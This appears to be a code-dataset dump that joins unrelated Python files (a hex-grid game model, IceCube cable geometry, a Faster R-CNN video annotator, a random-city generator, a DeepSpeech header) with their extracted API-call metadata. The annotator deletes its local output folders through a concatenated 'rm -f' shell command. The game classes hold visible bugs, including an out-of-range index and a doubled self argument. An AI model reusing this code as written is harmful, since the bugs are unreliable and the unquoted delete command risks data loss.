'((3,))\n', (2540, 2546), True, 'import jax.numpy as np\n'), ((2562, 2576), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), '((3,))\n', (2570, 2576), True, 'import jax.numpy as np\n'), ((2592, 2606), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), '((3,))\n', (2600, 2606), True, 'import jax.numpy as np\n'), ((2623, 2637), 'jax.numpy.zeros', 'np.zeros', (['(1,)'], {}), '((1,))\n', (2631, 2637), True, 'import jax.numpy as np\n'), ((2943, 2953), 'jax.numpy.abs', 'np.abs', (['R0'], {}), '(R0)\n', (2949, 2953), True, 'import jax.numpy as np\n'), ((3502, 3509), 'time.process_time', 'timer', ([], {}), '()\n', (3507, 3509), True, 'from time import process_time as timer\n'), ((3978, 4004), 'jax.numpy.dot', 'np.dot', (['Ac[i, :]', 'Ac[i, :]'], {}), '(Ac[i, :], Ac[i, :])\n', (3984, 4004), True, 'import jax.numpy as np\n'), ((4107, 4131), 'jax.numpy.linalg.norm', 'np.linalg.norm', (['Ac[i, :]'], {}), '(Ac[i, :])\n', (4121, 4131), True, 'import jax.numpy as np\n'), ((2392, 2402), 'jax.numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (2399, 2402), True, 'import jax.numpy as np\n'), ((2403, 2414), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2411, 2414), True, 'import numpy as onp\n'), ((2429, 2440), 'jax.numpy.sqrt', 'np.sqrt', (['(10)'], {}), '(10)\n', (2436, 2440), True, 'import jax.numpy as np\n'), ((2441, 2452), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2449, 2452), True, 'import numpy as onp\n'), ((2655, 2666), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2663, 2666), True, 'import numpy as onp\n'), ((2978, 2988), 'jax.numpy.abs', 'np.abs', (['V0'], {}), '(V0)\n', (2984, 2988), True, 'import jax.numpy as np\n'), ((3064, 3095), 'jax.numpy.array', 'np.array', (['[0.0, 0.0, -5.314961]'], {}), '([0.0, 0.0, -5.314961])\n', (3072, 3095), True, 'import jax.numpy as np\n'), ((3370, 3395), 'jax.numpy.hstack', 'np.hstack', (['(loss1, loss2)'], {}), '((loss1, loss2))\n', (3379, 3395), True, 'import jax.numpy as np\n'), ((4055, 4094), 'jax.numpy.dot', 'np.dot', (['LamV[i, :]', "(IC['ag'] + Ac[i, :])"], {}), "(LamV[i, :], IC['ag'] + Ac[i, :])\n", (4061, 4094), True, 'import jax.numpy as np\n'), ((4165, 4178), 'scipy.integrate.simps', 'simps', (['int', 't'], {}), '(int, t)\n', (4170, 4178), False, 'from scipy.integrate import simps\n'), ((4028, 4055), 'jax.numpy.dot', 'np.dot', (['LamR[i, :]', 'V[i, :]'], {}), '(LamR[i, :], V[i, :])\n', (4034, 4055), True, 'import jax.numpy as np\n'), ((3815, 3825), 'tfc.utils.egrad', 'egrad', (['lam'], {}), '(lam)\n', (3820, 3825), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((4465, 4490), 'jax.numpy.hstack', 'np.hstack', (['(loss1, loss2)'], {}), '((loss1, loss2))\n', (4474, 4490), True, 'import jax.numpy as np\n')]
|
"""
Data
================
data storage and manipulation classes, should be sufficient to run the game without display
"""
from enum import Enum
import numpy
class Facing(Enum):
YP = 0
XP = 1
ZN = 2
YN = 3
XN = 4
ZP = 5
# gives a directional delta array in hex coordinates for given Facing
def facing_array(enum):
if enum == Facing.YP:
return [0, 1, 0]
if enum == Facing.XP:
return [1, 0, 0]
if enum == Facing.ZN:
return [0, 0, -1]
if enum == Facing.YN:
return [0, -1, 0]
if enum == Facing.XN:
return [-1, 0, 0]
if enum == Facing.ZP:
return [0, 0, 1]
raise Exception(f'{enum} is not a valid Facing')
class Body:
def __init__(self, position=None, momentum=None, facing=Facing.YP, image=''):
if momentum is None:
momentum = [0, 0, 0]
if position is None:
position = [[0, 0]]
self.facing = facing
self.position = position # hex x y positions
self.momentum = momentum # hex x y z velocities
self._momentum_next = [0, 0, 0] # hex x y z velocities
self.image = image
# single hex movement by provided direction, none or 0 for inaction
def move(self, direction=None):
if direction is None:
direction = [0, 0, 0]
else:
direction = facing_array(direction)
numpy.add(self.position, direction)
numpy.add(self.momentum_next, direction)
# positive rotations are clockwise
def rotate(self, rotations, pivot=None):
if pivot is None:
pivot = self.position[0]
self.facing += rotations
if len(self.position) > 1:
for r in range(0, abs(rotations)):
if rotations > 0:
for i in range(0, len(self.position)):
p = numpy.subtract(self.position[i], pivot)
p = [-p[2], -p[0], -p[1]]
self.position[i] = numpy.add(p, pivot)
else:
for i in range(0, len(self.position)):
p = numpy.subtract(self.position[i], pivot)
p = [-p[1], -p[2], -p[10]]
self.position[i] = numpy.add(p, pivot)
# 1 = 60°, 6 rotations in a 360° turn
def degree_facing(self):
return self.facing * 60
def elapse_turn(self):
self.momentum = self._momentum_next
self._momentum_next = [0, 0, 0]
class Ship(Body):
def __init__(self, position=None, momentum=None, facing=Facing.YP,
image='', speed=1, rotation_speed=1, move_directions=[Facing.YP]):
super().__init__(position, momentum, facing, image)
self.speed = speed # number of movement/rotation actions you can make in a turn
self.action_points = speed
self.rotation_speed = rotation_speed # number of 60 degree turns allowed in one rotation action
self.move_directions = move_directions # legal directions to make moves in
def move(self, direction=None):
if direction is None:
direction = [0, 0, 0]
elif direction in self.move_directions:
super().move(self, direction)
else:
raise Exception(f'Invalid move direction {direction}, valid directions are {self.move_directions}')
self.action_points -= 1
def rotate(self, rotations, pivot=None):
return
class Map:
def __init__(self, width, height):
self.width = width
self.height = height
self.bodies = []
# NOTES FROM INITIAL GAME PLAY MECHANICS REVIEW:
#
# Body():
# (x, y)[]
# position
# (x1, x2, y)
# momentum
# (x1, x2, y)
# momentum_next
#
#
# def rotate((x, y)pivot, rotations
#
# ):
#
# # updates position
#
# def move((x1, x2, y)direction
#
# ):
# # updates position and momentum_next
#
#
# ImmutableBody(Body):
#
#
# def rotate((x, y)pivot, rotations
#
# ):
# return
#
#
# def move((x1, x2, y)direction
#
# ):
# return
#
# Ship(Body):
# rotation_speed
# speed
# Facing[]
# legal_moves # which direction thrusters can take us, 1 non zero value in tuple
#
#
# def rotate((x, y)pivot, rotations
#
# ):
# # if you rotate your legal_moves must update
#
#
# Map():
# x_width
# y_width
# []
# bodies
#
#
# class Facing(Enum):
# YP = 0
# X1P = 1
# X2P = 2
# YN = 3
# X1N = 4
# X2N = 5
|
[
"numpy.add",
"numpy.subtract"
] |
[((1398, 1433), 'numpy.add', 'numpy.add', (['self.position', 'direction'], {}), '(self.position, direction)\n', (1407, 1433), False, 'import numpy\n'), ((1442, 1482), 'numpy.add', 'numpy.add', (['self.momentum_next', 'direction'], {}), '(self.momentum_next, direction)\n', (1451, 1482), False, 'import numpy\n'), ((1867, 1906), 'numpy.subtract', 'numpy.subtract', (['self.position[i]', 'pivot'], {}), '(self.position[i], pivot)\n', (1881, 1906), False, 'import numpy\n'), ((2000, 2019), 'numpy.add', 'numpy.add', (['p', 'pivot'], {}), '(p, pivot)\n', (2009, 2019), False, 'import numpy\n'), ((2129, 2168), 'numpy.subtract', 'numpy.subtract', (['self.position[i]', 'pivot'], {}), '(self.position[i], pivot)\n', (2143, 2168), False, 'import numpy\n'), ((2263, 2282), 'numpy.add', 'numpy.add', (['p', 'pivot'], {}), '(p, pivot)\n', (2272, 2282), False, 'import numpy\n')]
|
from icecube.icetray import OMKey
from icecube.simclasses import I3MapModuleKeyI3ExtraGeometryItemCylinder, I3ExtraGeometryItemCylinder
from icecube.dataclasses import I3Position, ModuleKey
from I3Tray import I3Units
import numpy as np
from os.path import expandvars
from_cable_shadow = expandvars("$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt")
from_led7 = expandvars("$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt")
def GetIceCubeCableShadow(CableAngles=from_led7,
DOMRadius=165.1*I3Units.mm, CableRadius=23*I3Units.mm, CableLength=1*I3Units.m):
"""
Get a cylinder representing the position of the cable at each DOM
:param CableAngles: text file containing string, om, angle (degrees), angle error (degrees)
:param DOMRadius: radius of the DOM sphere
:param CableRadius: radius of the cable
:param CableLength: length of the cable segment at each DOM
:returns: a map of I3ExtraGeometryItem representing the local position of
the cable *in DOM-centered coordinates*
"""
# assume the cable runs along the surface of the DOM
radius = DOMRadius + CableRadius
shadows = I3MapModuleKeyI3ExtraGeometryItemCylinder()
for string, om, angle, _ in np.loadtxt(CableAngles, dtype=[('string',int),('om',int),('angle',float),('angle_err',float)]):
pos = I3Position(radius*np.cos(np.radians(angle)), radius*np.sin(np.radians(angle)), 0)
shadows[ModuleKey(int(string),int(om))] = I3ExtraGeometryItemCylinder(pos + I3Position(0,0,CableLength/2.), pos + I3Position(0,0,-CableLength/2.), CableRadius)
return shadows
|
[
"icecube.simclasses.I3MapModuleKeyI3ExtraGeometryItemCylinder",
"numpy.radians",
"os.path.expandvars",
"icecube.dataclasses.I3Position",
"numpy.loadtxt"
] |
[((291, 396), 'os.path.expandvars', 'expandvars', (['"""$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt"""'], {}), "(\n '$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt'\n )\n", (301, 396), False, 'from os.path import expandvars\n'), ((399, 496), 'os.path.expandvars', 'expandvars', (['"""$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt"""'], {}), "(\n '$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt'\n )\n", (409, 496), False, 'from os.path import expandvars\n'), ((1198, 1241), 'icecube.simclasses.I3MapModuleKeyI3ExtraGeometryItemCylinder', 'I3MapModuleKeyI3ExtraGeometryItemCylinder', ([], {}), '()\n', (1239, 1241), False, 'from icecube.simclasses import I3MapModuleKeyI3ExtraGeometryItemCylinder, I3ExtraGeometryItemCylinder\n'), ((1274, 1379), 'numpy.loadtxt', 'np.loadtxt', (['CableAngles'], {'dtype': "[('string', int), ('om', int), ('angle', float), ('angle_err', float)]"}), "(CableAngles, dtype=[('string', int), ('om', int), ('angle',\n float), ('angle_err', float)])\n", (1284, 1379), True, 'import numpy as np\n'), ((1550, 1585), 'icecube.dataclasses.I3Position', 'I3Position', (['(0)', '(0)', '(CableLength / 2.0)'], {}), '(0, 0, CableLength / 2.0)\n', (1560, 1585), False, 'from icecube.dataclasses import I3Position, ModuleKey\n'), ((1588, 1624), 'icecube.dataclasses.I3Position', 'I3Position', (['(0)', '(0)', '(-CableLength / 2.0)'], {}), '(0, 0, -CableLength / 2.0)\n', (1598, 1624), False, 'from icecube.dataclasses import I3Position, ModuleKey\n'), ((1409, 1426), 'numpy.radians', 'np.radians', (['angle'], {}), '(angle)\n', (1419, 1426), True, 'import numpy as np\n'), ((1443, 1460), 'numpy.radians', 'np.radians', (['angle'], {}), '(angle)\n', (1453, 1460), True, 'import numpy as np\n')]
|
import itertools
import operator
import os
import pickle
import re
import sys
import time
import cv2
from keras import backend as K
from keras.layers import Input
from keras.models import Model
import skvideo.io
from keras_frcnn import roi_helpers
import keras_frcnn.resnet as nn
import numpy as np
video_folder = '../../Videos/'
videoName = "MOV_0861"
input_video_file = os.path.abspath(video_folder + videoName + ".mp4")
output_video_file = os.path.abspath(video_folder + "OUTPUT/" + videoName + ".mp4")
img_path = os.path.join(video_folder +"OUTPUT/input", '')
output_path = os.path.join(video_folder +"OUTPUT/output", '')
num_rois = 32
frame_rate = 30
def cleanup():
print("cleaning up...")
os.popen('rm -f ' + img_path + '*')
os.popen('rm -f ' + output_path + '*')
def get_file_names(search_path):
for (dirpath, _, filenames) in os.walk(search_path):
for filename in filenames:
yield filename # os.path.join(dirpath, filename)
def convert_to_images():
counter = 0
videodata = skvideo.io.vreader(input_video_file)
for frame in videodata:
skvideo.io.vwrite(os.path.join(img_path, str(counter) + '.jpg'), frame)
counter = counter + 1
def save_to_video():
list_files = sorted(get_file_names(output_path), key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
# start the FFmpeg writing subprocess with following parameters
writer = skvideo.io.FFmpegWriter(output_video_file, outputdict={
'-vcodec': 'libx264', "-r":str(frame_rate)}, verbosity=1)
for file in list_files:
frame = skvideo.io.vread(os.path.join(output_path, file))
writer.writeFrame(frame)
writer.close()
def format_img(img, C):
img_min_side = float(C.im_size)
(height, width, _) = img.shape
if width <= height:
f = img_min_side / width
new_height = int(f * height)
new_width = int(img_min_side)
else:
f = img_min_side / height
new_width = int(f * width)
new_height = int(img_min_side)
img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)
img = img[:, :, (2, 1, 0)]
img = img.astype(np.float32)
img[:, :, 0] -= C.img_channel_mean[0]
img[:, :, 1] -= C.img_channel_mean[1]
img[:, :, 2] -= C.img_channel_mean[2]
img /= C.img_scaling_factor
img = np.transpose(img, (2, 0, 1))
img = np.expand_dims(img, axis=0)
return img
def accumulate(l):
it = itertools.groupby(l, operator.itemgetter(0))
for key, subiter in it:
yield key, sum(item[1] for item in subiter)
def main():
sys.setrecursionlimit(40000)
config_output_filename = './config.pickle'
with open(config_output_filename, 'rb') as f_in:
C = pickle.load(f_in)
# turn off any data augmentation at test time
C.use_horizontal_flips = False
C.use_vertical_flips = False
C.rot_90 = False
class_mapping = C.class_mapping
if 'bg' not in class_mapping:
class_mapping['bg'] = len(class_mapping)
class_mapping = {v: k for k, v in class_mapping.items()}
print(class_mapping)
class_to_color = {class_mapping[v]: np.random.randint(0, 255, 3).tolist() for v in class_mapping}
C.num_rois = num_rois
if K.image_dim_ordering() == 'th':
input_shape_img = (3, None, None)
input_shape_features = (1024, None, None)
else:
input_shape_img = (None, None, 3)
input_shape_features = (None, None, 1024)
img_input = Input(shape=input_shape_img)
roi_input = Input(shape=(C.num_rois, 4))
feature_map_input = Input(shape=input_shape_features)
# define the base network (resnet here, can be VGG, Inception, etc)
shared_layers = nn.nn_base(img_input, trainable=True)
# define the RPN, built on the base layers
num_anchors = len(C.anchor_box_scales) * len(C.anchor_box_ratios)
rpn_layers = nn.rpn(shared_layers, num_anchors)
classifier = nn.classifier(feature_map_input, roi_input, C.num_rois, nb_classes=len(class_mapping), trainable=True)
model_rpn = Model(img_input, rpn_layers)
model_classifier_only = Model([feature_map_input, roi_input], classifier)
model_classifier = Model([feature_map_input, roi_input], classifier)
model_rpn.load_weights(C.model_path, by_name=True)
model_classifier.load_weights(C.model_path, by_name=True)
model_rpn.compile(optimizer='sgd', loss='mse')
model_classifier.compile(optimizer='sgd', loss='mse')
bbox_threshold = 0.8
print("anotating...")
list_files = sorted(get_file_names(img_path), key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for img_name in list_files:
if not img_name.lower().endswith(('.bmp', '.jpeg', '.jpg', '.png', '.tif', '.tiff')):
continue
print(img_name)
st = time.time()
filepath = os.path.join(img_path, img_name)
img = cv2.imread(filepath)
X = format_img(img, C)
img_scaled = np.transpose(X.copy()[0, (2, 1, 0), :, :], (1, 2, 0)).copy()
img_scaled[:, :, 0] += 123.68
img_scaled[:, :, 1] += 116.779
img_scaled[:, :, 2] += 103.939
img_scaled = img_scaled.astype(np.uint8)
if K.image_dim_ordering() == 'tf':
X = np.transpose(X, (0, 2, 3, 1))
# get the feature maps and output from the RPN
[Y1, Y2, F] = model_rpn.predict(X)
R = roi_helpers.rpn_to_roi(Y1, Y2, C, K.image_dim_ordering(), overlap_thresh=0.7)
# convert from (x1,y1,x2,y2) to (x,y,w,h)
R[:, 2] -= R[:, 0]
R[:, 3] -= R[:, 1]
# apply the spatial pyramid pooling to the proposed regions
bboxes = {}
probs = {}
for jk in range(R.shape[0] // C.num_rois + 1):
ROIs = np.expand_dims(R[C.num_rois * jk:C.num_rois * (jk + 1), :], axis=0)
if ROIs.shape[1] == 0:
break
if jk == R.shape[0] // C.num_rois:
# pad R
curr_shape = ROIs.shape
target_shape = (curr_shape[0], C.num_rois, curr_shape[2])
ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
ROIs_padded[:, :curr_shape[1], :] = ROIs
ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
ROIs = ROIs_padded
[P_cls, P_regr] = model_classifier_only.predict([F, ROIs])
for ii in range(P_cls.shape[1]):
if np.max(P_cls[0, ii, :]) < bbox_threshold or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
continue
cls_name = class_mapping[np.argmax(P_cls[0, ii, :])]
if cls_name not in bboxes:
bboxes[cls_name] = []
probs[cls_name] = []
(x, y, w, h) = ROIs[0, ii, :]
cls_num = np.argmax(P_cls[0, ii, :])
try:
(tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
tx /= C.classifier_regr_std[0]
ty /= C.classifier_regr_std[1]
tw /= C.classifier_regr_std[2]
th /= C.classifier_regr_std[3]
x, y, w, h = roi_helpers.apply_regr(x, y, w, h, tx, ty, tw, th)
except:
pass
bboxes[cls_name].append([16 * x, 16 * y, 16 * (x + w), 16 * (y + h)])
probs[cls_name].append(np.max(P_cls[0, ii, :]))
all_dets = []
all_objects = []
for key in bboxes:
bbox = np.array(bboxes[key])
new_boxes, new_probs = roi_helpers.non_max_suppression_fast(bbox, np.array(probs[key]), overlap_thresh=0.5)
for jk in range(new_boxes.shape[0]):
(x1, y1, x2, y2) = new_boxes[jk, :]
cv2.rectangle(img_scaled, (x1, y1), (x2, y2), class_to_color[key], 2)
textLabel = '{}: {}'.format(key, int(100 * new_probs[jk]))
all_dets.append((key, 100 * new_probs[jk]))
all_objects.append((key, 1))
(retval, baseLine) = cv2.getTextSize(textLabel, cv2.FONT_HERSHEY_COMPLEX, 1, 1)
textOrg = (x1, y1 - 0)
cv2.rectangle(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (0, 0, 0), 2)
cv2.rectangle(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (255, 255, 255), -1)
cv2.putText(img_scaled, textLabel, textOrg, cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 0), 1)
print('Elapsed time = {}'.format(time.time() - st))
height, width, channels = img_scaled.shape
cv2.rectangle(img_scaled, (0, 0), (width, 30), (0, 0, 0), -1)
cv2.putText(img_scaled, "Obj count: " + str(list(accumulate(all_objects))), (5, 19), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1)
cv2.imwrite(os.path.join(output_path, img_name), img_scaled)
print(all_dets)
if __name__ == '__main__':
cleanup()
print("Converting video to images..")
convert_to_images()
print("Main ...")
main()
print("saving to video..")
save_to_video()
|
[
"numpy.argmax",
"os.popen",
"os.walk",
"keras.models.Model",
"keras.backend.image_dim_ordering",
"pickle.load",
"numpy.random.randint",
"cv2.rectangle",
"keras.layers.Input",
"sys.setrecursionlimit",
"os.path.join",
"os.path.abspath",
"numpy.transpose",
"numpy.max",
"re.findall",
"cv2.resize",
"cv2.putText",
"cv2.getTextSize",
"numpy.zeros",
"numpy.expand_dims",
"time.time",
"cv2.imread",
"numpy.array",
"keras_frcnn.resnet.nn_base",
"keras_frcnn.resnet.rpn",
"keras_frcnn.roi_helpers.apply_regr",
"operator.itemgetter"
] |
[((375, 425), 'os.path.abspath', 'os.path.abspath', (["(video_folder + videoName + '.mp4')"], {}), "(video_folder + videoName + '.mp4')\n", (390, 425), False, 'import os\n'), ((446, 508), 'os.path.abspath', 'os.path.abspath', (["(video_folder + 'OUTPUT/' + videoName + '.mp4')"], {}), "(video_folder + 'OUTPUT/' + videoName + '.mp4')\n", (461, 508), False, 'import os\n'), ((520, 567), 'os.path.join', 'os.path.join', (["(video_folder + 'OUTPUT/input')", '""""""'], {}), "(video_folder + 'OUTPUT/input', '')\n", (532, 567), False, 'import os\n'), ((581, 629), 'os.path.join', 'os.path.join', (["(video_folder + 'OUTPUT/output')", '""""""'], {}), "(video_folder + 'OUTPUT/output', '')\n", (593, 629), False, 'import os\n'), ((702, 737), 'os.popen', 'os.popen', (["('rm -f ' + img_path + '*')"], {}), "('rm -f ' + img_path + '*')\n", (710, 737), False, 'import os\n'), ((739, 777), 'os.popen', 'os.popen', (["('rm -f ' + output_path + '*')"], {}), "('rm -f ' + output_path + '*')\n", (747, 777), False, 'import os\n'), ((845, 865), 'os.walk', 'os.walk', (['search_path'], {}), '(search_path)\n', (852, 865), False, 'import os\n'), ((1964, 2035), 'cv2.resize', 'cv2.resize', (['img', '(new_width, new_height)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n', (1974, 2035), False, 'import cv2\n'), ((2247, 2275), 'numpy.transpose', 'np.transpose', (['img', '(2, 0, 1)'], {}), '(img, (2, 0, 1))\n', (2259, 2275), True, 'import numpy as np\n'), ((2283, 2310), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (2297, 2310), True, 'import numpy as np\n'), ((2483, 2511), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(40000)'], {}), '(40000)\n', (2504, 2511), False, 'import sys\n'), ((3288, 3316), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape_img'}), '(shape=input_shape_img)\n', (3293, 3316), False, 'from keras.layers import Input\n'), ((3330, 3358), 'keras.layers.Input', 'Input', ([], {'shape': '(C.num_rois, 4)'}), '(shape=(C.num_rois, 4))\n', (3335, 3358), False, 'from keras.layers import Input\n'), ((3380, 3413), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape_features'}), '(shape=input_shape_features)\n', (3385, 3413), False, 'from keras.layers import Input\n'), ((3501, 3538), 'keras_frcnn.resnet.nn_base', 'nn.nn_base', (['img_input'], {'trainable': '(True)'}), '(img_input, trainable=True)\n', (3511, 3538), True, 'import keras_frcnn.resnet as nn\n'), ((3665, 3699), 'keras_frcnn.resnet.rpn', 'nn.rpn', (['shared_layers', 'num_anchors'], {}), '(shared_layers, num_anchors)\n', (3671, 3699), True, 'import keras_frcnn.resnet as nn\n'), ((3832, 3860), 'keras.models.Model', 'Model', (['img_input', 'rpn_layers'], {}), '(img_input, rpn_layers)\n', (3837, 3860), False, 'from keras.models import Model\n'), ((3886, 3935), 'keras.models.Model', 'Model', (['[feature_map_input, roi_input]', 'classifier'], {}), '([feature_map_input, roi_input], classifier)\n', (3891, 3935), False, 'from keras.models import Model\n'), ((3957, 4006), 'keras.models.Model', 'Model', (['[feature_map_input, roi_input]', 'classifier'], {}), '([feature_map_input, roi_input], classifier)\n', (3962, 4006), False, 'from keras.models import Model\n'), ((2371, 2393), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (2390, 2393), False, 'import operator\n'), ((2613, 2630), 'pickle.load', 'pickle.load', (['f_in'], {}), '(f_in)\n', (2624, 2630), False, 'import pickle\n'), ((3075, 3097), 'keras.backend.image_dim_ordering', 'K.image_dim_ordering', ([], {}), '()\n', (3095, 3097), True, 'from keras import backend as K\n'), ((4565, 4576), 'time.time', 'time.time', ([], {}), '()\n', (4574, 4576), False, 'import time\n'), ((4590, 4622), 'os.path.join', 'os.path.join', (['img_path', 'img_name'], {}), '(img_path, img_name)\n', (4602, 4622), False, 'import os\n'), ((4631, 4651), 'cv2.imread', 'cv2.imread', (['filepath'], {}), '(filepath)\n', (4641, 4651), False, 'import cv2\n'), ((7790, 7851), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(0, 0)', '(width, 30)', '(0, 0, 0)', '(-1)'], {}), '(img_scaled, (0, 0), (width, 30), (0, 0, 0), -1)\n', (7803, 7851), False, 'import cv2\n'), ((1578, 1609), 'os.path.join', 'os.path.join', (['output_path', 'file'], {}), '(output_path, file)\n', (1590, 1609), False, 'import os\n'), ((4902, 4924), 'keras.backend.image_dim_ordering', 'K.image_dim_ordering', ([], {}), '()\n', (4922, 4924), True, 'from keras import backend as K\n'), ((4941, 4970), 'numpy.transpose', 'np.transpose', (['X', '(0, 2, 3, 1)'], {}), '(X, (0, 2, 3, 1))\n', (4953, 4970), True, 'import numpy as np\n'), ((5099, 5121), 'keras.backend.image_dim_ordering', 'K.image_dim_ordering', ([], {}), '()\n', (5119, 5121), True, 'from keras import backend as K\n'), ((5380, 5447), 'numpy.expand_dims', 'np.expand_dims', (['R[C.num_rois * jk:C.num_rois * (jk + 1), :]'], {'axis': '(0)'}), '(R[C.num_rois * jk:C.num_rois * (jk + 1), :], axis=0)\n', (5394, 5447), True, 'import numpy as np\n'), ((6752, 6773), 'numpy.array', 'np.array', (['bboxes[key]'], {}), '(bboxes[key])\n', (6760, 6773), True, 'import numpy as np\n'), ((8004, 8039), 'os.path.join', 'os.path.join', (['output_path', 'img_name'], {}), '(output_path, img_name)\n', (8016, 8039), False, 'import os\n'), ((2985, 3013), 'numpy.random.randint', 'np.random.randint', (['(0)', '(255)', '(3)'], {}), '(0, 255, 3)\n', (3002, 3013), True, 'import numpy as np\n'), ((6218, 6244), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6227, 6244), True, 'import numpy as np\n'), ((6844, 6864), 'numpy.array', 'np.array', (['probs[key]'], {}), '(probs[key])\n', (6852, 6864), True, 'import numpy as np\n'), ((6971, 7040), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(x1, y1)', '(x2, y2)', 'class_to_color[key]', '(2)'], {}), '(img_scaled, (x1, y1), (x2, y2), class_to_color[key], 2)\n', (6984, 7040), False, 'import cv2\n'), ((7211, 7269), 'cv2.getTextSize', 'cv2.getTextSize', (['textLabel', 'cv2.FONT_HERSHEY_COMPLEX', '(1)', '(1)'], {}), '(textLabel, cv2.FONT_HERSHEY_COMPLEX, 1, 1)\n', (7226, 7269), False, 'import cv2\n'), ((7302, 7449), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(textOrg[0] - 5, textOrg[1] + baseLine - 5)', '(textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5)', '(0, 0, 0)', '(2)'], {}), '(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (\n textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (0, 0, 0), 2)\n', (7315, 7449), False, 'import cv2\n'), ((7449, 7608), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(textOrg[0] - 5, textOrg[1] + baseLine - 5)', '(textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5)', '(255, 255, 255)', '(-1)'], {}), '(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (\n textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (255, 255, 255\n ), -1)\n', (7462, 7608), False, 'import cv2\n'), ((7603, 7692), 'cv2.putText', 'cv2.putText', (['img_scaled', 'textLabel', 'textOrg', 'cv2.FONT_HERSHEY_DUPLEX', '(1)', '(0, 0, 0)', '(1)'], {}), '(img_scaled, textLabel, textOrg, cv2.FONT_HERSHEY_DUPLEX, 1, (0,\n 0, 0), 1)\n', (7614, 7692), False, 'import cv2\n'), ((6055, 6081), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6064, 6081), True, 'import numpy as np\n'), ((6485, 6535), 'keras_frcnn.roi_helpers.apply_regr', 'roi_helpers.apply_regr', (['x', 'y', 'w', 'h', 'tx', 'ty', 'tw', 'th'], {}), '(x, y, w, h, tx, ty, tw, th)\n', (6507, 6535), False, 'from keras_frcnn import roi_helpers\n'), ((6659, 6682), 'numpy.max', 'np.max', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6665, 6682), True, 'import numpy as np\n'), ((7724, 7735), 'time.time', 'time.time', ([], {}), '()\n', (7733, 7735), False, 'import time\n'), ((1294, 1326), 're.findall', 're.findall', (['"""[^0-9]|[0-9]+"""', 'var'], {}), "('[^0-9]|[0-9]+', var)\n", (1304, 1326), False, 'import re\n'), ((4375, 4407), 're.findall', 're.findall', (['"""[^0-9]|[0-9]+"""', 'var'], {}), "('[^0-9]|[0-9]+', var)\n", (4385, 4407), False, 'import re\n'), ((5643, 5665), 'numpy.zeros', 'np.zeros', (['target_shape'], {}), '(target_shape)\n', (5651, 5665), True, 'import numpy as np\n'), ((5915, 5938), 'numpy.max', 'np.max', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (5921, 5938), True, 'import numpy as np\n'), ((5959, 5985), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (5968, 5985), True, 'import numpy as np\n')]
|
import numpy as np # type: ignore
city_num = 20
file_path = "./coordinates/"
output_file = "random_" + str(city_num) + "_cities.csv"
if __name__ == "__main__":
# “continuous uniform” distribution random
np_cities = np.random.random((city_num, 2))
np.savetxt(file_path + output_file, np_cities, delimiter=",")
|
[
"numpy.savetxt",
"numpy.random.random"
] |
[((226, 257), 'numpy.random.random', 'np.random.random', (['(city_num, 2)'], {}), '((city_num, 2))\n', (242, 257), True, 'import numpy as np\n'), ((262, 323), 'numpy.savetxt', 'np.savetxt', (['(file_path + output_file)', 'np_cities'], {'delimiter': '""","""'}), "(file_path + output_file, np_cities, delimiter=',')\n", (272, 323), True, 'import numpy as np\n')]
|
"""Contains DeepSpeech2 model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import time
import logging
import gzip
import copy
import numpy as np
import inspect
from utils.decoder.swig_wrapper import Scorer
from utils.decoder.swig_wrapper import ctc_greedy_decoder
